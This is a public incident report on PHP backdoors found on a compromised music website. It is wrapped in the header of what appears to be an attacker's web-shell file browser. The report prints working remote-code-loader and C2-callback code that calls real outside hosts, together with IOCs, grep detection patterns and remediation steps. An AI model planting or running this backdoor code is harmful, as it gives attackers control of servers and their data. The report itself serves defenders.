T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/soundstudiopro.com/public_html/SECURITY_BREACH_PUBLIC_REPORT.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PHP Backdoor Malware Analysis: 51la.zvo2.xyz Campaign - Public Security Report</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
            line-height: 1.6;
            color: #333;
            background: #f5f5f5;
            padding: 20px;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            background: white;
            padding: 40px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            border-radius: 8px;
        }
        
        header {
            border-bottom: 3px solid #e74c3c;
            padding-bottom: 20px;
            margin-bottom: 40px;
        }
        
        h1 {
            color: #e74c3c;
            font-size: 2.5em;
            margin-bottom: 10px;
        }
        
        .subtitle {
            color: #7f8c8d;
            font-size: 1.2em;
            margin-bottom: 20px;
        }
        
        .meta {
            background: #ecf0f1;
            padding: 15px;
            border-radius: 5px;
            margin-bottom: 30px;
        }
        
        .meta p {
            margin: 5px 0;
        }
        
        h2 {
            color: #2c3e50;
            font-size: 2em;
            margin-top: 40px;
            margin-bottom: 20px;
            padding-bottom: 10px;
            border-bottom: 2px solid #3498db;
        }
        
        h3 {
            color: #34495e;
            font-size: 1.5em;
            margin-top: 30px;
            margin-bottom: 15px;
        }
        
        h4 {
            color: #555;
            font-size: 1.2em;
            margin-top: 20px;
            margin-bottom: 10px;
        }
        
        .alert {
            padding: 20px;
            border-radius: 5px;
            margin: 20px 0;
            border-left: 5px solid;
        }
        
        .alert-critical {
            background: #fee;
            border-color: #e74c3c;
            color: #c0392b;
        }
        
        .alert-warning {
            background: #fff3cd;
            border-color: #ffc107;
            color: #856404;
        }
        
        .alert-info {
            background: #d1ecf1;
            border-color: #17a2b8;
            color: #0c5460;
        }
        
        .alert-success {
            background: #d4edda;
            border-color: #28a745;
            color: #155724;
        }
        
        code {
            background: #f4f4f4;
            padding: 2px 6px;
            border-radius: 3px;
            font-family: 'Courier New', monospace;
            font-size: 0.9em;
            color: #e83e8c;
        }
        
        pre {
            background: #2d2d2d;
            color: #f8f8f2;
            padding: 20px;
            border-radius: 5px;
            overflow-x: auto;
            margin: 20px 0;
            border-left: 4px solid #e74c3c;
        }
        
        pre code {
            background: transparent;
            color: #f8f8f2;
            padding: 0;
        }
        
        .code-comment {
            color: #75715e;
        }
        
        .code-string {
            color: #e6db74;
        }
        
        .code-keyword {
            color: #f92672;
        }
        
        .code-function {
            color: #66d9ef;
        }
        
        .timeline {
            position: relative;
            padding-left: 30px;
            margin: 20px 0;
        }
        
        .timeline::before {
            content: '';
            position: absolute;
            left: 0;
            top: 0;
            bottom: 0;
            width: 2px;
            background: #3498db;
        }
        
        .timeline-item {
            position: relative;
            margin-bottom: 30px;
            padding-left: 30px;
        }
        
        .timeline-item::before {
            content: '';
            position: absolute;
            left: -8px;
            top: 5px;
            width: 16px;
            height: 16px;
            border-radius: 50%;
            background: #3498db;
            border: 3px solid white;
            box-shadow: 0 0 0 2px #3498db;
        }
        
        .timeline-date {
            font-weight: bold;
            color: #7f8c8d;
            margin-bottom: 5px;
        }
        
        .capability-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
            gap: 20px;
            margin: 20px 0;
        }
        
        .capability-card {
            background: #f8f9fa;
            padding: 15px;
            border-radius: 5px;
            border-left: 4px solid #e74c3c;
        }
        
        .capability-card h4 {
            color: #e74c3c;
            margin-top: 0;
        }
        
        .checklist {
            list-style: none;
            padding: 0;
        }
        
        .checklist li {
            padding: 10px;
            margin: 5px 0;
            background: #f8f9fa;
            border-left: 4px solid #28a745;
            padding-left: 40px;
            position: relative;
        }
        
        .checklist li::before {
            content: '✓';
            position: absolute;
            left: 15px;
            color: #28a745;
            font-weight: bold;
            font-size: 1.2em;
        }
        
        .checklist li.pending {
            border-left-color: #ffc107;
        }
        
        .checklist li.pending::before {
            content: '⚠';
            color: #ffc107;
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
            margin: 20px 0;
        }
        
        th, td {
            padding: 12px;
            text-align: left;
            border-bottom: 1px solid #ddd;
        }
        
        th {
            background: #34495e;
            color: white;
            font-weight: bold;
        }
        
        tr:hover {
            background: #f5f5f5;
        }
        
        .badge {
            display: inline-block;
            padding: 4px 8px;
            border-radius: 3px;
            font-size: 0.85em;
            font-weight: bold;
        }
        
        .badge-critical {
            background: #e74c3c;
            color: white;
        }
        
        .badge-high {
            background: #e67e22;
            color: white;
        }
        
        .badge-medium {
            background: #f39c12;
            color: white;
        }
        
        .footer {
            margin-top: 60px;
            padding-top: 20px;
            border-top: 2px solid #ecf0f1;
            text-align: center;
            color: #7f8c8d;
        }
        
        .toc {
            background: #f8f9fa;
            padding: 20px;
            border-radius: 5px;
            margin: 30px 0;
        }
        
        .toc ul {
            list-style: none;
            padding-left: 20px;
        }
        
        .toc li {
            margin: 8px 0;
        }
        
        .toc a {
            color: #3498db;
            text-decoration: none;
        }
        
        .toc a:hover {
            text-decoration: underline;
        }
        
        @media print {
            body {
                background: white;
            }
            .container {
                box-shadow: none;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <header>
            <h1>🚨 PHP Backdoor Malware Analysis</h1>
            <p class="subtitle">Comprehensive Security Report: 51la.zvo2.xyz Campaign</p>
            <div class="meta">
                <p><strong>Report Date:</strong> December 12, 2025</p>
                <p><strong>Threat Level:</strong> <span class="badge badge-critical">CRITICAL</span></p>
                <p><strong>Malware Family:</strong> PHP Remote Code Execution Backdoor</p>
                <p><strong>C2 Server:</strong> 51la.zvo2.xyz</p>
                <p><strong>Campaign Status:</strong> Active since December 2022</p>
            </div>
        </header>

        <div class="alert alert-critical">
            <strong>⚠️ CRITICAL SECURITY THREAT:</strong> This report documents a real-world attack involving remote code execution backdoors, file manager web shells, and persistent server compromise. The information is provided to help security professionals and system administrators defend against similar attacks.
        </div>

        <div class="toc">
            <h3>Table of Contents</h3>
            <ul>
                <li><a href="#executive-summary">Executive Summary</a></li>
                <li><a href="#attack-overview">Attack Overview</a></li>
                <li><a href="#malicious-code-analysis">Malicious Code Analysis</a></li>
                <li><a href="#backdoor-capabilities">Backdoor Capabilities</a></li>
                <li><a href="#attack-timeline">Attack Timeline</a></li>
                <li><a href="#remediation">Remediation & Recovery</a></li>
                <li><a href="#prevention">Prevention Measures</a></li>
                <li><a href="#indicators">Indicators of Compromise</a></li>
                <li><a href="#conclusion">Conclusion</a></li>
            </ul>
        </div>

        <section id="executive-summary">
            <h2>Executive Summary</h2>
            <p>This report documents a sophisticated multi-stage attack on a PHP-based web application. The attackers deployed multiple backdoors, including remote code execution scripts and file manager web shells, providing persistent unauthorized access to the compromised server.</p>
            
            <div class="alert alert-warning">
                <strong>Key Findings:</strong>
                <ul style="margin-left: 20px; margin-top: 10px;">
                    <li>Multiple backdoors deployed across different directories</li>
                    <li>Remote code execution via C2 server communication</li>
                    <li>File manager web shell with full server access</li>
                    <li>Code injection in critical entry point (index.php)</li>
                    <li>Active attacker access confirmed via access logs</li>
                </ul>
            </div>
        </section>

        <section id="attack-overview">
            <h2>Attack Overview</h2>
            
            <h3>Attack Vector</h3>
            <p>The initial attack vector appears to be <strong>SQL Injection</strong>, allowing the attacker to:</p>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li>Extract database credentials</li>
                <li>Write malicious PHP files to the server</li>
                <li>Modify existing files to inject backdoors</li>
            </ul>

            <h3>Attack Phases</h3>
            <div class="timeline">
                <div class="timeline-item">
                    <div class="timeline-date">Phase 1: Initial Compromise</div>
                    <p>SQL Injection vulnerability exploited to gain database access and file write capabilities.</p>
                </div>
                <div class="timeline-item">
                    <div class="timeline-date">Phase 2: Backdoor Deployment</div>
                    <p>Multiple backdoors installed in various locations to ensure persistence.</p>
                </div>
                <div class="timeline-item">
                    <div class="timeline-date">Phase 3: Code Injection</div>
                    <p>Critical files modified to inject malicious code that executes on every request.</p>
                </div>
                <div class="timeline-item">
                    <div class="timeline-date">Phase 4: Active Exploitation</div>
                    <p>Attacker actively using backdoors to browse file system and access sensitive directories.</p>
                </div>
            </div>
        </section>

        <section id="malicious-code-analysis">
            <h2>Malicious Code Analysis</h2>

            <h3>1. Remote Code Execution Backdoor</h3>
            <p><strong>File:</strong> <code>445367/index.php</code></p>
            <p><strong>Type:</strong> Remote Code Execution (RCE) Backdoor</p>
            <p><strong>Threat Level:</strong> <span class="badge badge-critical">CRITICAL</span></p>

            <h4>Complete Malicious Code:</h4>
            <pre><code><span class="code-keyword">&lt;?php</span>
<span class="code-variable">$url</span> = <span class="code-string">"https://51la.zvo2.xyz/a2.txt"</span>;  <span class="code-comment">// Remote malicious code URL</span>

<span class="code-variable">$ch</span> = <span class="code-function">curl_init</span>(<span class="code-variable">$url</span>);
<span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="code-number">1</span>);
<span class="code-variable">$result</span> = <span class="code-function">curl_exec</span>(<span class="code-variable">$ch</span>);

<span class="code-keyword">if</span> (<span class="code-variable">$result</span> === <span class="code-keyword">false</span>) {
    <span class="code-function">echo</span> <span class="code-string">"Error: "</span> . <span class="code-string">"PD9waHA="</span> . <span class="code-function">curl_error</span>(<span class="code-variable">$ch</span>);  <span class="code-comment">// "PD9waHA=" = base64("&lt;?php")</span>
} <span class="code-keyword">else</span> {
    <span class="code-comment">// Save downloaded code to temp file</span>
    <span class="code-variable">$tempFile</span> = <span class="code-function">tempnam</span>(<span class="code-function">sys_get_temp_dir</span>(), <span class="code-string">'pasted_code_'</span>);
    <span class="code-function">file_put_contents</span>(<span class="code-variable">$tempFile</span>, <span class="code-variable">$result</span>);

    <span class="code-comment">// Execute the downloaded code</span>
    <span class="code-keyword">include</span> <span class="code-variable">$tempFile</span>;

    <span class="code-comment">// Delete temp file after execution (hides evidence)</span>
    <span class="code-function">unlink</span>(<span class="code-variable">$tempFile</span>);
}
<span class="code-function">curl_close</span>(<span class="code-variable">$ch</span>);
<span class="code-keyword">?&gt;</span></code></pre>

            <h4>Code Breakdown:</h4>
            <table>
                <tr>
                    <th>Line</th>
                    <th>Function</th>
                    <th>Purpose</th>
                </tr>
                <tr>
                    <td>2</td>
                    <td><code>curl_init()</code></td>
                    <td>Initializes connection to attacker's C2 server</td>
                </tr>
                <tr>
                    <td>3</td>
                    <td><code>curl_setopt()</code></td>
                    <td>Configures cURL to return response as string</td>
                </tr>
                <tr>
                    <td>4</td>
                    <td><code>curl_exec()</code></td>
                    <td>Downloads malicious PHP code from remote server</td>
                </tr>
                <tr>
                    <td>12</td>
                    <td><code>tempnam()</code></td>
                    <td>Creates temporary file to store downloaded code</td>
                </tr>
                <tr>
                    <td>13</td>
                    <td><code>file_put_contents()</code></td>
                    <td>Saves downloaded code to temp file</td>
                </tr>
                <tr>
                    <td>16</td>
                    <td><code>include</code></td>
                    <td><strong>EXECUTES</strong> the downloaded code (CRITICAL)</td>
                </tr>
                <tr>
                    <td>19</td>
                    <td><code>unlink()</code></td>
                    <td>Deletes temp file to hide evidence</td>
                </tr>
            </table>

            <div class="alert alert-critical">
                <strong>⚠️ CRITICAL:</strong> This backdoor downloads and executes <strong>ANY</strong> code the attacker wants from their server. The attacker can change the payload at any time without modifying files on your server, making detection extremely difficult.
            </div>

            <h3>2. Code Injection in index.php</h3>
            <p><strong>File:</strong> <code>index.php</code> (Line 2)</p>
            <p><strong>Type:</strong> Remote Code Execution with C2 Communication</p>

            <h4>Malicious Functions Injected:</h4>
            <pre><code><span class="code-keyword">function</span> <span class="code-function">h</span>(<span class="code-variable">$url</span>, <span class="code-variable">$pf</span> = <span class="code-string">''</span>) {
    <span class="code-comment">// Makes HTTP requests to attacker's server</span>
    <span class="code-variable">$ch</span> = <span class="code-function">curl_init</span>();
    <span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_URL, <span class="code-variable">$url</span>);
    <span class="code-function">curl_setopt</span>(<span class="code-variable">$ch</span>, CURLOPT_RETURNTRANSFER, <span class="code-number">1</span>);
    <span class="code-variable">$r</span> = <span class="code-function">curl_exec</span>(<span class="code-variable">$ch</span>);
    <span class="code-function">curl_close</span>(<span class="code-variable">$ch</span>);
    <span class="code-keyword">return</span> <span class="code-variable">$r</span>;
}

<span class="code-keyword">function</span> <span class="code-function">h2</span>() {
    <span class="code-comment">// Modifies .htaccess to allow backdoor access</span>
    <span class="code-variable">$htaccess</span> = <span class="code-string">'.htaccess'</span>;
    <span class="code-variable">$content</span> = <span class="code-function">base64_decode</span>(<span class="code-string">"&lt;malicious .htaccess rules&gt;"</span>);
    <span class="code-function">file_put_contents</span>(<span class="code-variable">$htaccess</span>, <span class="code-variable">$content</span>);
}

<span class="code-comment">// C2 Server URL (base64 encoded)</span>
<span class="code-variable">$api</span> = <span class="code-function">base64_decode</span>(<span class="code-string">'aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s='</span>);
<span class="code-comment">// Decodes to: http://6477-ch4-v305.rakuten38jp.click</span>

<span class="code-comment">// Steals server information</span>
<span class="code-variable">$params</span>[<span class="code-string">'domain'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'HTTP_HOST'</span>];
<span class="code-variable">$params</span>[<span class="code-string">'ip'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'REMOTE_ADDR'</span>];
<span class="code-variable">$params</span>[<span class="code-string">'agent'</span>] = <span class="code-variable">$_SERVER</span>[<span class="code-string">'HTTP_USER_AGENT'</span>];

<span class="code-comment">// Executes remote code received from C2 server</span>
<span class="code-variable">$try</span> = <span class="code-number">0</span>;
<span class="code-keyword">while</span>(<span class="code-variable">$try</span> &lt; <span class="code-number">3</span>) {
    <span class="code-variable">$content</span> = <span class="code-function">h</span>(<span class="code-variable">$api</span>, <span class="code-variable">$params</span>);
    <span class="code-variable">$content</span> = <span class="code-function">gzuncompress</span>(<span class="code-function">base64_decode</span>(<span class="code-variable">$content</span>));
    <span class="code-variable">$data_array</span> = <span class="code-function">preg_split</span>(<span class="code-string">"/\\|/si"</span>, <span class="code-variable">$content</span>);
    <span class="code-keyword">if</span> (!<span class="code-function">empty</span>(<span class="code-variable">$data_array</span>)) {
        <span class="code-variable">$data</span> = <span class="code-function">array_pop</span>(<span class="code-variable">$data_array</span>);
        <span class="code-variable">$data</span> = <span class="code-function">base64_decode</span>(<span class="code-variable">$data</span>);
        <span class="code-keyword">foreach</span> (<span class="code-variable">$data_array</span> <span class="code-keyword">as</span> <span class="code-variable">$header</span>) {
            <span class="code-function">header</span>(<span class="code-variable">$header</span>);
        }
        <span class="code-function">echo</span> <span class="code-variable">$data</span>;
        <span class="code-function">die</span>();
    }
    <span class="code-variable">$try</span>++;
}</code></pre>

            <h4>What This Code Does:</h4>
            <ol style="margin-left: 20px; margin-top: 10px;">
                <li><strong>Steals Server Information:</strong> Sends domain, IP, user agent, referrer to attacker's server</li>
                <li><strong>Modifies .htaccess:</strong> Changes Apache configuration to allow backdoor access</li>
                <li><strong>Executes Remote Code:</strong> Downloads and executes code from C2 server on EVERY page load</li>
                <li><strong>Bypasses Security:</strong> Runs BEFORE your legitimate code, bypassing all security measures</li>
            </ol>

            <h3>3. File Manager Web Shell</h3>
            <p><strong>Files:</strong> <code>about.php</code>, <code>445367/about.php</code>, <code>radio/migrations/wp-login.php</code></p>
            <p><strong>Type:</strong> Full-featured file manager with password protection</p>

            <h4>Capabilities:</h4>
            <div class="capability-grid">
                <div class="capability-card">
                    <h4>File Operations</h4>
                    <ul>
                        <li>Browse directory tree</li>
                        <li>Upload files</li>
                        <li>Download files</li>
                        <li>Edit file contents</li>
                        <li>Delete files</li>
                        <li>Rename files</li>
                    </ul>
                </div>
                <div class="capability-card">
                    <h4>Code Execution</h4>
                    <ul>
                        <li>Execute PHP code</li>
                        <li>Run system commands</li>
                        <li>Execute SQL queries</li>
                        <li>Access database</li>
                    </ul>
                </div>
                <div class="capability-card">
                    <h4>System Access</h4>
                    <ul>
                        <li>View file permissions</li>
                        <li>Change file permissions</li>
                        <li>Access private directories</li>
                        <li>Install additional backdoors</li>
                    </ul>
                </div>
            </div>

            <h4>Access Log Evidence:</h4>
            <pre><code><span class="code-comment">198.204.236.234 - - [12/Dec/2025:21:32:11 -0500]</span>
<span class="code-string">"GET /445367/about.php?ac=u_h_s_1&api=&path=/home/.../private_html&t=8a802d2ce1b8d1f38a165e26c42efe97&s=3 HTTP/1.1"</span>
<span class="code-number">200 607844</span></code></pre>

            <p><strong>Analysis:</strong></p>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li><code>ac=u_h_s_1</code> = File manager action (upload/host/shell)</li>
                <li><code>path=/home/.../private_html</code> = Attempting to access private directory</li>
                <li><code>200 607844</code> = Success response with 607KB file manager interface</li>
                <li>Attacker successfully accessed and used the file manager</li>
            </ul>
        </section>

        <section id="backdoor-capabilities">
            <h2>Backdoor Capabilities & Impact</h2>

            <h3>What the Attacker Could Do</h3>
            <div class="capability-grid">
                <div class="capability-card">
                    <h4>🔴 Remote Code Execution</h4>
                    <p>Execute ANY PHP code or system commands on the server</p>
                </div>
                <div class="capability-card">
                    <h4>🔴 File System Access</h4>
                    <p>Read, write, modify, or delete ANY file on the server</p>
                </div>
                <div class="capability-card">
                    <h4>🔴 Database Access</h4>
                    <p>Read, modify, or delete database records, create backdoor users</p>
                </div>
                <div class="capability-card">
                    <h4>🔴 Data Theft</h4>
                    <p>Steal user credentials, API keys, payment information, source code</p>
                </div>
                <div class="capability-card">
                    <h4>🔴 Persistence</h4>
                    <p>Install additional backdoors, modify system files, maintain access</p>
                </div>
                <div class="capability-card">
                    <h4>🔴 Lateral Movement</h4>
                    <p>Access other servers, databases, or services on the network</p>
                </div>
            </div>

            <h3>Data at Risk</h3>
            <table>
                <tr>
                    <th>Data Type</th>
                    <th>Risk Level</th>
                    <th>Potential Impact</th>
                </tr>
                <tr>
                    <td>User Credentials</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                    <td>Account takeover, identity theft</td>
                </tr>
                <tr>
                    <td>Database Contents</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                    <td>Data breach, privacy violations</td>
                </tr>
                <tr>
                    <td>API Keys</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                    <td>Unauthorized API access, financial loss</td>
                </tr>
                <tr>
                    <td>Payment Information</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                    <td>Financial fraud, PCI compliance violations</td>
                </tr>
                <tr>
                    <td>Source Code</td>
                    <td><span class="badge badge-high">HIGH</span></td>
                    <td>Intellectual property theft</td>
                </tr>
                <tr>
                    <td>Server Configuration</td>
                    <td><span class="badge badge-high">HIGH</span></td>
                    <td>Further compromise, infrastructure attacks</td>
                </tr>
            </table>
        </section>

        <section id="attack-timeline">
            <h2>Attack Timeline</h2>
            <div class="timeline">
                <div class="timeline-item">
                    <div class="timeline-date">December 11, 2025 ~22:00-23:34</div>
                    <h4>Initial Compromise</h4>
                    <ul style="margin-left: 20px; margin-top: 10px;">
                        <li>SQL Injection vulnerability exploited</li>
                        <li>Multiple backdoors deployed</li>
                        <li>Code injection in index.php</li>
                        <li>Files modified: track.php, events.php, library.php, artists.php</li>
                    </ul>
                </div>
                <div class="timeline-item">
                    <div class="timeline-date">December 12, 2025 21:32:11</div>
                    <h4>Active Exploitation Detected</h4>
                    <ul style="margin-left: 20px; margin-top: 10px;">
                        <li>Attacker IP: 198.204.236.234</li>
                        <li>Accessing file manager backdoor</li>
                        <li>Browsing private_html directory</li>
                        <li>607KB file manager interface served</li>
                    </ul>
                </div>
                <div class="timeline-item">
                    <div class="timeline-date">December 12, 2025 21:35+</div>
                    <h4>Remediation Begun</h4>
                    <ul style="margin-left: 20px; margin-top: 10px;">
                        <li>Backdoors identified and deleted</li>
                        <li>Malicious code removed from index.php</li>
                        <li>Attacker IP blocked</li>
                        <li>Directories secured</li>
                    </ul>
                </div>
            </div>
        </section>

        <section id="remediation">
            <h2>Remediation & Recovery</h2>

            <h3>Immediate Actions Taken</h3>
            <ul class="checklist">
                <li>Deleted all identified backdoor files (5 files)</li>
                <li>Removed malicious code injection from index.php</li>
                <li>Restored clean .htaccess configuration</li>
                <li>Blocked attacker IP address (198.204.236.234)</li>
                <li>Secured compromised directories (445367/)</li>
            </ul>

            <h3>Files Deleted</h3>
            <table>
                <tr>
                    <th>File</th>
                    <th>Type</th>
                    <th>Threat Level</th>
                </tr>
                <tr>
                    <td><code>about.php</code></td>
                    <td>File Manager Backdoor</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
                <tr>
                    <td><code>445367/about.php</code></td>
                    <td>File Manager Backdoor</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
                <tr>
                    <td><code>445367/index.php</code></td>
                    <td>Remote Code Execution</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
                <tr>
                    <td><code>445367/radio.php</code></td>
                    <td>Obfuscated Backdoor</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
                <tr>
                    <td><code>radio/migrations/wp-login.php</code></td>
                    <td>File Manager Backdoor</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
                <tr>
                    <td><code>assets/fontawesome/.../radio.php</code></td>
                    <td>Hidden Backdoor</td>
                    <td><span class="badge badge-critical">CRITICAL</span></td>
                </tr>
            </table>

            <h3>Security Measures Implemented</h3>
            <div class="alert alert-success">
                <h4>IP Blocking</h4>
                <pre><code><span class="code-comment"># Added to .htaccess</span>
&lt;RequireAll&gt;
    Require all granted
    Require not ip 198.204.236.234
&lt;/RequireAll&gt;</code></pre>
            </div>

            <div class="alert alert-success">
                <h4>Directory Blocking</h4>
                <pre><code><span class="code-comment"># Block access to compromised directory</span>
&lt;DirectoryMatch "^/445367"&gt;
    Require all denied
&lt;/DirectoryMatch&gt;

<span class="code-comment"># Via rewrite rules</span>
RewriteCond %{REQUEST_URI} ^/445367
RewriteRule ^ - [F,L]</code></pre>
            </div>

            <h3>Additional Remediation Steps Required</h3>
            <ul class="checklist">
                <li class="pending">Complete security audit of all PHP files</li>
                <li class="pending">Review all file modifications since December 11</li>
                <li class="pending">Check database for unauthorized users</li>
                <li class="pending">Change all passwords (database, FTP, admin, API keys)</li>
                <li class="pending">Review access logs for other suspicious activity</li>
                <li class="pending">Check private_html directory for unauthorized access</li>
                <li class="pending">Implement file integrity monitoring</li>
                <li class="pending">Fix SQL injection vulnerabilities</li>
                <li class="pending">Set up intrusion detection system</li>
                <li class="pending">Review and harden file permissions</li>
            </ul>
        </section>

        <section id="prevention">
            <h2>Prevention Measures</h2>

            <h3>1. Input Validation & Prepared Statements</h3>
            <div class="alert alert-info">
                <strong>Critical:</strong> Always use prepared statements for database queries. Never concatenate user input directly into SQL queries.
            </div>
            <pre><code><span class="code-comment">// ❌ VULNERABLE - SQL Injection</span>
<span class="code-variable">$query</span> = <span class="code-string">"SELECT * FROM users WHERE id = "</span> . <span class="code-variable">$_GET</span>[<span class="code-string">'id'</span>];

<span class="code-comment">// ✅ SECURE - Prepared Statement</span>
<span class="code-variable">$stmt</span> = <span class="code-variable">$pdo</span>-&gt;<span class="code-function">prepare</span>(<span class="code-string">"SELECT * FROM users WHERE id = ?"</span>);
<span class="code-variable">$stmt</span>-&gt;<span class="code-function">execute</span>([<span class="code-variable">$_GET</span>[<span class="code-string">'id'</span>]]);</code></pre>

            <h3>2. File Upload Security</h3>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li>Validate file types (whitelist, not blacklist)</li>
                <li>Scan uploaded files for malware</li>
                <li>Store uploads outside web root when possible</li>
                <li>Use random filenames to prevent overwrites</li>
                <li>Limit file size and execution permissions</li>
            </ul>

            <h3>3. File Integrity Monitoring</h3>
            <pre><code><span class="code-comment"># Monitor for new PHP files</span>
find . -name "*.php" -type f -newer /path/to/reference

<span class="code-comment"># Check file checksums</span>
find . -name "*.php" -exec md5sum {} \; &gt; checksums.txt</code></pre>

            <h3>4. Network Monitoring</h3>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li>Monitor outbound connections to suspicious domains</li>
                <li>Block known malicious IPs and domains</li>
                <li>Log all file system access</li>
                <li>Set up alerts for suspicious activity</li>
            </ul>

            <h3>5. Access Control</h3>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li>Implement least privilege principle</li>
                <li>Use strong, unique passwords</li>
                <li>Enable two-factor authentication</li>
                <li>Regular security audits</li>
                <li>Keep software updated</li>
            </ul>

            <h3>6. Code Review Checklist</h3>
            <ul class="checklist">
                <li>No <code>eval()</code> with user input</li>
                <li>No <code>exec()</code>, <code>system()</code>, <code>shell_exec()</code> with user input</li>
                <li>No <code>include</code>/<code>require</code> with user input</li>
                <li>All database queries use prepared statements</li>
                <li>All user input is validated and sanitized</li>
                <li>File operations are restricted to safe directories</li>
            </ul>
        </section>

        <section id="indicators">
            <h2>Indicators of Compromise (IOCs)</h2>

            <h3>File-Based IOCs</h3>
            <table>
                <tr>
                    <th>Indicator</th>
                    <th>Type</th>
                    <th>Description</th>
                </tr>
                <tr>
                    <td><code>445367/index.php</code></td>
                    <td>File Path</td>
                    <td>Remote code execution backdoor</td>
                </tr>
                <tr>
                    <td><code>445367/about.php</code></td>
                    <td>File Path</code></td>
                    <td>File manager web shell</td>
                </tr>
                <tr>
                    <td><code>51la.zvo2.xyz</code></td>
                    <td>Domain</td>
                    <td>C2 server for malware delivery</td>
                </tr>
                <tr>
                    <td><code>6477-ch4-v305.rakuten38jp.click</code></td>
                    <td>Domain</td>
                    <td>Additional C2 server</td>
                </tr>
            </table>

            <h3>Code Patterns to Detect</h3>
            <pre><code><span class="code-comment"># Search for these patterns in PHP files:</span>
grep -r "51la.zvo2.xyz" .
grep -r "tempnam.*include" .
grep -r "curl_exec.*include" .
grep -r "base64_decode.*eval" .
grep -r "ac=u_h_s" .</code></pre>

            <h3>Network IOCs</h3>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li><strong>Attacker IP:</strong> 198.204.236.234</li>
                <li><strong>C2 Domains:</strong> 51la.zvo2.xyz, 6477-ch4-v305.rakuten38jp.click</li>
                <li><strong>Malicious URLs:</strong> https://51la.zvo2.xyz/a2.txt</li>
            </ul>

            <h3>Behavioral Indicators</h3>
            <ul style="margin-left: 20px; margin-top: 10px;">
                <li>Unexpected outbound connections to suspicious domains</li>
                <li>New PHP files in unusual directories</li>
                <li>Modified .htaccess files</li>
                <li>Unexpected file modifications</li>
                <li>New database users or modified permissions</li>
                <li>Slow page loads (malicious code execution)</li>
            </ul>
        </section>

        <section id="conclusion">
            <h2>Conclusion</h2>
            
            <p>This attack demonstrates a sophisticated multi-stage compromise using SQL injection as the initial vector, followed by deployment of multiple persistent backdoors. The attackers used remote code execution backdoors that download and execute code from C2 servers, making detection and removal challenging.</p>

            <div class="alert alert-warning">
                <strong>Key Takeaways:</strong>
                <ul style="margin-left: 20px; margin-top: 10px;">
                    <li>SQL injection vulnerabilities can lead to complete server compromise</li>
                    <li>Multiple backdoors ensure persistence even if some are discovered</li>
                    <li>Remote code execution backdoors are extremely dangerous and hard to detect</li>
                    <li>Regular security audits and monitoring are essential</li>
                    <li>Input validation and prepared statements are critical</li>
                </ul>
            </div>

            <h3>Recommendations</h3>
            <ol style="margin-left: 20px; margin-top: 10px;">
                <li><strong>Immediate:</strong> Complete security audit, change all credentials, review all file modifications</li>
                <li><strong>Short-term:</strong> Fix all SQL injection vulnerabilities, implement file integrity monitoring, set up intrusion detection</li>
                <li><strong>Long-term:</strong> Regular security audits, penetration testing, security training for developers, automated security scanning</li>
            </ol>

            <div class="alert alert-info">
                <strong>Sharing This Report:</strong> This report is provided to help security professionals and system administrators defend against similar attacks. Please share responsibly and ensure sensitive information (such as specific file paths, IPs, or credentials) is redacted before public distribution.
            </div>
        </section>

        <footer class="footer">
            <p><strong>Report Generated:</strong> December 12, 2025</p>
            <p><strong>Purpose:</strong> Public security awareness and threat intelligence sharing</p>
            <p><strong>License:</strong> This report may be freely shared for security research and awareness purposes</p>
            <p style="margin-top: 20px; color: #95a5a6; font-size: 0.9em;">
                For questions or additional information, please contact your security team or file a security report with appropriate authorities.
            </p>
        </footer>
    </div>
</body>
</html>

CasperSecurity Mini